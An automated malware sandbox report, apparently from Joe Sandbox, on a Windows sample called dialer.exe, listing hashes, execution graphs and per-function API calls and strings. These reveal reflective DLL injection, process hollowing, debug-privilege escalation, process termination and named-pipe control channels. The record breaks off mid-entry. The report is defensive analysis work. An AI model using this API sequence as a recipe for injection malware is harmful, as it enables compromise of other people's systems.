                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:69
                                                                    Start time:06:24:34
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00007FF6F1D41140 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1387303207.00007FF6F1D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1D40000, based on PE: true
                                                                      • Associated: 00000000.00000002.1387288654.00007FF6F1D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1387324950.00007FF6F1D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1387351991.00007FF6F1D58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1387370927.00007FF6F1D59000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1387948709.00007FF6F224D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1388076494.00007FF6F2286000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1388105957.00007FF6F2289000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6f1d40000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction ID: 5b2d039728eea8e69cff1657858c9eaf84520d5001e628ba799055f481b5d0bf
                                                                      • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction Fuzzy Hash: F4B01230D0830985E3002F09E8413593270BB187C2F500230C51C433D2EF7D60404B11

                                                                      Execution Graph

                                                                      Execution Coverage:46.1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:67%
                                                                      Total number of Nodes:227
                                                                      Total number of Limit Nodes:24
                                                                      execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                      Callgraph

                                                                      Executed Functions

                                                                      Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                      • API String ID: 4177739653-1130149537
                                                                      • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                      • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                      Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                      • API String ID: 2561231171-3753927220
                                                                      • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                      • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                      Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                      • String ID:
                                                                      • API String ID: 4084875642-0
                                                                      • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                      • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                      Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 3197395349-0
                                                                      • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                      • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                      Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                      • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                        • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                        • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                        • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                      • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                      • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                      • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                      • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 1323846700-0
                                                                      • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                      • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                      Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                      • String ID: .text$C:\Windows\System32\
                                                                      • API String ID: 2721474350-832442975
                                                                      • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                      • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                      Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2203880229-3489460547
                                                                      • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                      • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                      • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                      • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                      Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 2071455217-3440882674
                                                                      • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                      • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                      • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                      • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                      Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
